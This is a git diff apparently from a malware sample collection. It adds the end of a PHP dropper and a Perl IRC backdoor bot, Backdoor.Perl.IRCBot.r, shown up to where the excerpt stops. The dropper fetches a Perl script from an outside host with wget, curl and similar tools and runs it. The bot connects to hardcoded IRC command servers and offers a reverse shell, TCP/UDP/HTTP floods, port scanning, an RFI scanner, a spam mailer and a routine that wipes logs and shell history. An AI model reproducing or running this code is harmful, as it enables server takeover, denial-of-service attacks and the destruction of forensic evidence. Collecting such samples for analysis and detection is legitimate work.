+system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;rm -rf 21.txt*');
+system('cd /tmp;rm -rf 21.txt**');
+passthru('cd /tmp;rm -rf 21.txt**');
+shell_exec('cd /tmp;rm -rf 21.txt**');
+system('cd /tmp;rm -rf 21.txt**');
+passthru('cd /tmp;rm -rf 21.txt**');
+shell_exec('cd /tmp;rm -rf 21.txt*');
+system('cd /tmp;rm -rf 21.txt**');
+passthru('cd /tmp;rm -rf 21.txt**');
+shell_exec('cd /tmp;rm -rf 21.txt**');
+system('cd /tmp;rm -rf 21.txt**');
+passthru('cd /tmp;rm -rf 21.txt**');
+
+if ($free === FALSE) {$free = 0;} 
+
+if ($free < 0) {$free = 0;} 
+echo "Free:".view_size($free)."<br>"; 
+
+$cmd="id";
+$eseguicmd=ex($cmd);
+echo $eseguicmd;
+
+function ex($cfe){
+$res = '';
+if (!empty($cfe)){
+if(function_exists('exec')){
+@exec($cfe,$res);
+$res = join("\n",$res);
+}
+elseif(function_exists('shell_exec')){
+$res = @shell_exec($cfe);
+}
+elseif(function_exists('system')){
+@ob_start();
+@system($cfe);
+$res = @ob_get_contents();
+@ob_end_clean();
+}
+elseif(function_exists('passthru')){
+@ob_start();
+@passthru($cfe);
+$res = @ob_get_contents();
+@ob_end_clean();
+}
+elseif(@is_resource($f = @popen($cfe,"r"))){
+$res = "";
+while(!@feof($f)) { $res .= @fread($f,1024); }
+@pclose($f);
+}}
+return $res;
+}
+
+function view_size($size) 
+
+{ 
+
+ if (!is_numeric($size)) {return FALSE;} 
+
+ else 
+
+ { 
+
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+
+  else {$size = $size . " B";} 
+
+  return $size; 
+
+ } 
+
+} 
+
+exit;
diff --git a/Perl/Backdoor.Perl.IRCBot.r b/Perl/Backdoor.Perl.IRCBot.r
new file mode 100644
index 00000000..a2c8b252
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.r
@@ -0,0 +1,1333 @@
+# 
+# + Improved Scanner
+# + Improved Configuration
+# + Nmap PortScan
+# + LogCleaner
+# + Mailer
+#
+#You can use the following commands :
+#
+#
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+
+######################
+use HTTP::Request;
+use LWP::UserAgent;
+######################
+my $processo = '[httpds]';
+######################
+#####################################################################
+#/!\                          .:CONFIGURATION:.                  /!\#
+#####################################################################
+############################################
+my $linas_max='8';
+#-----------------                         #
+# Maximum Lines for Anti Flood             #
+#############################################
+my $sleep='5';
+#-----------------                         #                                      
+#Sleep Time                                #
+############################################
+my $cmd="http://renewable-energy-news.com/cool.gif";
+#-----------------                         #
+#CMD that is printed in the channel        #
+############################################
+my $id="http://gundam-gundam.net/derf";
+#-----------------                         #
+#ID = Response CMD                         #
+############################################
+my @adms=("putr4","emping","nob0dy");
+#-----------------                         #
+#Admins of the Bot set your nickname here  #
+############################################
+my @canais=("#test");
+#-----------------                         #
+#Put your channel here                     #
+############################################
+my @nickname = ("sial|");
+my $nick = $nickname[rand scalar @nickname];
+#-----------------                         #
+#Nickname of bot                           #
+############################################
+my $ircname ='fuck';
+chop (my $realname = '-=[!]putr4[!]=-');
+#-----------------                         #
+#IRC name and Realname                     #
+############################################
+$servidor='irc.mildnet.cn' unless $servidor;
+my $porta='6667';
+#-----------------                         #
+#IRCServer and port                        #
+############################################
+#####################################################################
+#/!\                          .:CONFIGURATION:.                  /!\#
+#####################################################################
+######################
+#End of Configuration# 
+#                    #
+######################
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+
+#Connect
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Masalah fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+    } else {
+    print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+  my $meunick = $_[0];
+  my $servidor_con = $_[1];
+  my $porta_con = $_[2];
+  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+  PeerPort=>$porta_con) or return(1);
+  if (defined($IRC_socket)) {
+    $IRC_cur_socket = $IRC_socket;
+    $IRC_socket->autoflush(1);
+    $sel_cliente->add($IRC_socket);
+    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+    nick("$meunick");
+    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+    sleep 1;
+  }
+}
+
+my $line_temp;
+while( 1 ) {
+  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+  delete($irc_servers{''}) if (defined($irc_servers{''}));
+  my @ready = $sel_cliente->can_read(0);
+  next unless(@ready);
+  foreach $fh (@ready) {
+    $IRC_cur_socket = $fh;
+    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+    $nread = sysread($fh, $msg, 4096);
+    if ($nread == 0) {
+      $sel_cliente->remove($fh);
+      $fh->close;
+      delete($irc_servers{$fh});
+    }
+    @lines = split (/\n/, $msg);
+    for(my $c=0; $c<= $#lines; $c++) {
+
+      $line = $lines[$c];
+      $line=$line_temp.$line if ($line_temp);
+      $line_temp='';
+      $line =~ s/\r$//;
+      unless ($c == $#lines) {
+        parse("$line");
+        } else {
+        if ($#lines == 0) {
+          parse("$line");
+          } elsif ($lines[$c] =~ /\r$/) {
+          parse("$line");
+          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+          parse("$line"); 
+          	   } else {
+          	               $line_temp = $line;
+        }
+      }
+    }
+  }
+}
+
+sub parse {
+  my $servarg = shift;
+  if ($servarg =~ /^PING \:(.*)/) {
+    sendraw("PONG :$1");
+    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+    if ($args =~ /^\001VERSION\001$/) {
+      	 notice("$pn", "\001VERSION mIRC v6.31 putr4\001");
+    }
+    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+    if ($onde eq "$meunick"){
+    shell("$pn", "$args");
+  }
+  
+#End of Connect
+
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+  
+######################
+#      PREFIX        #
+#                    #
+######################
+# You can change the prefix if you want but the commands will be different 
+# The standard prefix is !bot if you change it into !bitch for example 
+# every command will be like !bitch @udpflood, !bitch @googlescan.
+# So its recommended not to change this ;)
+######################
+  
+  if ($args =~ /^(\Q$meunick\E|\!hajar)\s+(.*)/ ) {
+    my $natrix = $1;
+    my $arg = $2;
+    if ($arg =~ /^\!(.*)/) {
+      ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
+      } elsif ($arg =~ /^\@(.*)/) {
+      $ondep = $onde;
+      $ondep = $pn if $onde eq $meunick;
+      bfunc("$ondep","$1");
+      } else {
+      shell("$onde", "$arg");
+    }
+  }
+}
+}
+######################
+#   End of PREFIX    #
+#                    #
+######################
+
+elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+if (lc($1) eq lc($meunick)) {
+  $meunick=$4;
+  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+}
+} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+nick("$meunick".int rand(999999));
+} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+$meunick = $2;
+$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+foreach my $canal (@canais) {
+  sendraw("JOIN $canal ddosit");
+}
+}
+}
+
+sub bfunc {
+my $printl = $_[0];
+my $funcarg = $_[1];
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+  exit;
+} else {
+
+######################
+#       Help         # 
+#                    #
+######################
+
+if ($funcarg =~ /^help/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Select the function you want help for");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@ddos");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfiscan");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@backconnect");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscanner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Or if you want too know all the commands type:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@commands");
+
+}
+
+if ($funcarg =~ /^ddos/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 There are 3 DDossers in this bot");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 UDPFlood, HTTPFlood and TCPFlood");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>");
+
+}
+
+if ($funcarg =~ /^rfiscan/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot also contains a RFI Scanner.");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 That contains the engines :12G4o8o12g9l4e4, 7M4S7N4, 7All7The7Web4, 14A4S14K4, 7AOL, 1L7yc1o7s4, 13Y6ahoo  ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfi <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can find strings here : http://www.xshqiptaretx.org/strings.txt ");
+
+}
+
+if ($funcarg =~ /^backconnect/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You use backconnect like this :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>");
+}
+
+if ($funcarg =~ /^shell/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot has a integrated shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use it in private but also public in the channel");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 In public channel just use : 7!bot cd tmp12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 For help with the linux commands type :!bot 7@linuxhelp");
+}
+
+if ($funcarg =~ /^portscanner/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 There is a normal portscan and a Nmap:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@nmap <ip> <beginport> <endport>");
+}
+
+if ($funcarg =~ /^commands/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use the following commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@nmap <ip> <beginport> <endport>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot cd tmp 12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@linuxhelp");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfi <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@system");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@hapus");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@sendmail <subject> <sender> <recipient> <message>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@milw0rm");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@join #channel");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@part #channel");
+}
+
+if ($funcarg =~ /^linuxhelp/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Dir where you are : pwd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Start a Perl file : perl file.pl");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Go back from dir : cd ..");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Force to Remove a file/dir : rm -rf file/dir;ls -la");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Show all files/dir with permissions : ls -lia");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find config.inc.php files : find / -type f -name config.inc.php");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all writable folders and files : find / -perm -2 -ls");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all .htpasswd files : find / -type f -name .htpasswd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all service.pwd files : find / -type f -name service.pwd");
+}
+
+######################
+#   End of  Help     # 
+#                    #
+######################
+
+######################
+#     Commands       # 
+#                    #
+######################
+
+if ($funcarg =~ /^system/) {
+$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Info BOT : 7 Servidor :Hiden : 6667");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uname -a     : 7 $uname");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uptime       : 7 $uptime");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Prosses  : 7 $processo");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12ID           : 7 $id");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Dir      : 7 $ownd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12OS           : 7 $distro");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Owner        : 7 someone");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Channel      : 7 secret");
+}
+
+if ($funcarg =~ /^milw0rm/) {
+	my @ltt=();
+	my @bug=();
+	my $x;
+	my $page="";
+	my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
+	print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$socke>;
+	$page="@r";
+	close($socke);
+	while ($page =~  m/<title>(.*)</g){
+	$x = $1;
+	if ($x =~ /\&lt\;/) {
+	$x =~ s/\&lt\;/</g;
+	}
+	if ($x !~ /milw0rm/) {
+	push (@bug,$x);
+	}}
+	while ($page =~  m/<link.*expl.*([0-9]...)</g) {
+	if ($1 !~ m/milw0rm.com|exploits|en/){
+	push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+	}}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12 Latest exploits :");
+	foreach $x (0..(@ltt - 1)) {
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12  $bug[$x] - $ltt[$x]");
+	sleep 1;
+}}
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+######################
+#      Portscan      # 
+#                    #
+######################
+
+if ($funcarg =~ /^portscan (.*)/) {
+  my $hostip="$1";
+  my
+  @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
+  my (@aberta, %porta_banner);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Scanning for open ports on  4".$1." 12 started .");
+  foreach my $porta (@portas)  {
+    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
+    'tcp', Timeout => 4);
+    if ($scansock) {
+      push (@aberta, $porta);
+      $scansock->close;
+    }
+  }
+  
+  if (@aberta) {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Open ports founded: @aberta");
+    } else {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 No open ports foundend.");
+  }
+}
+
+######################
+#  End of  Portscan  # 
+#                    #
+######################
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+######################
+#        Nmap        #  
+#                    #
+######################
+   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
+         my $hostip="$1";
+         my $portstart = "$2";
+         my $portend = "$3";
+         my (@abertas, %porta_banner); 
+       sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| 4: $1 12.:4Ports12:. 4 $2-$3");
+       foreach my $porta ($portstart..$portend){
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); 
+    if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($xstats){
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| 12Founded 4 $porta"."/Open"); 
+                 }
+               }
+             }
+             if (@abertas) {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| Complete ");
+             } else {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| No open ports have been founded 13");
+             }
+			 }
+######################
+#    End of Nmap     #  
+#                    #
+######################
+# 
+# someone
+#
+######################
+#    Log Cleaner     #  
+#                    #
+######################
+if ($funcarg =~ /^hapus/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 This process can be long, just wait"); 
+    system 'rm -rf /var/log/lastlog';
+    system 'rm -rf /var/log/wtmp';
+	system 'rm -rf /etc/wtmp';
+	system 'rm -rf /var/run/utmp';
+	system 'rm -rf /etc/utmp';
+	system 'rm -rf /var/log';
+	system 'rm -rf /var/logs';
+	system 'rm -rf /var/adm';
+	system 'rm -rf /var/apache/log';
+	system 'rm -rf /var/apache/logs';
+	system 'rm -rf /usr/local/apache/log'; 
+	system 'rm -rf /usr/local/apache/logs';
+	system 'rm -rf /root/.bash_history';
+	system 'rm -rf /root/.ksh_history';
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 All default log and bash_history files erased"); 
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 Now Erasing the rest of the machine log files");
+	system 'find / -name *.bash_history -exec rm -rf {} \;';
+	system 'find / -name *.bash_logout -exec rm -rf {} \;';
+	system 'find / -name "log*" -exec rm -rf {} \;';
+	system 'find / -name *.log -exec rm -rf {} \;';
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 Done! All logs erased"); 
+      }
+######################
+# End of Log Cleaner #  
+#                    #
+######################
+# 
+# someone
+#
+######################
+#       MAILER       #  
+#                    #
+######################
+# For mailing use :
+# !bot @sendmail <subject> <sender> <recipient> <message>
+#
+######################
+if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Sending Mail to :2 $3");
+$subject = $1;
+$sender = $2;
+$recipient = $3; 
+@corpo = $4;
+$mailtype = "content-type: text/html";
+$sendmail = '/usr/sbin/sendmail';
+open (SENDMAIL, "| $sendmail -t");
+print SENDMAIL "$mailtype\n";
+print SENDMAIL "Subject: $subject\n"; 
+print SENDMAIL "From: $sender\n";
+print SENDMAIL "To: $recipient\n\n";
+print SENDMAIL "@corpo\n\n";
+close (SENDMAIL);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Mail Sended To :2 $recipient"); 
+}
+######################
+#   End of MAILER    #  
+#                    #
+######################
+######################
+#  Join And Part     # 
+#                    #
+######################
+           if ($funcarg =~ /^join (.*)/) {
+              sendraw($IRC_cur_socket, "JOIN ".$1);
+           }
+           if ($funcarg =~ /^part (.*)/) {
+              sendraw($IRC_cur_socket, "PART ".$1);
+           }
+		   
+######################
+#End of Join And Part# 
+#                    #
+######################
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+######################
+#     TCPFlood       # 
+#                    #
+######################
+
+if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4TCP DDos12:.4|12 Attacking 4 ".$1.":".$2." 12for 4 ".$3." 12seconds.");
+  my $itime = time;
+  my ($cur_time);
+  $cur_time = time - $itime;
+  while ($3>$cur_time){
+  $cur_time = time - $itime;
+  &tcpflooder("$1","$2","$3");
+}
+sendraw($IRC_cur_socket,"PRIVMSG $printl :4|12.:4TCP DDos12:.4| 12Attack done 4 ".$1.":".$2.".");
+}
+######################
+#  End of TCPFlood   # 
+#                    #
+######################
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+######################
+#   Back Connect     # 
+#                    #
+######################
+if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+my $host = "$1";
+my $porta = "$2";
+my $proto = getprotobyname('tcp');
+my $iaddr = inet_aton($host);
+my $paddr = sockaddr_in($porta, $iaddr);
+my $shell = "/bin/sh -i";
+if ($^O eq "MSWin32") {
+  $shell = "cmd.exe";
+}
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+connect(SOCKET, $paddr) or die "connect: $!";
+open(STDIN, ">&SOCKET");
+open(STDOUT, ">&SOCKET");
+open(STDERR, ">&SOCKET");
+system("$shell");
+close(STDIN);
+close(STDOUT);
+close(STDERR);
+if ($estatisticas)
+{
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4BackConnect12:.4|12 Connecting to 4 $host:$porta");
+}
+}
+######################
+#End of  Back Connect# 
+#                    #
+######################
+###################################################################################
+#  		   _      _  _     ____  _      _____ _____ 			  #
+#  		  / \__/|/ \/ \   /  _ \/ \  /|/  __//__ __\			  #
+#  		  | |\/||| || |   | | \|| |\ |||  \    / \  			  #
+#  		  | |  ||| || |_/\| |_/|| | \|||  /_   | |  			  #
+#  		  \_/  \|\_/\____/\____/\_/  \|\____\  \_/  			  #
+#							     someone???Production #
+###################################################################################
+######################
+#    MULTI SCANNER   # 
+#                    #
+######################
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+### Start Message
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Starting Scan for 4$bug 12$dork");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Please wait while making Search Engines ready, this can take a while so be patient ");
+### End of Start Message
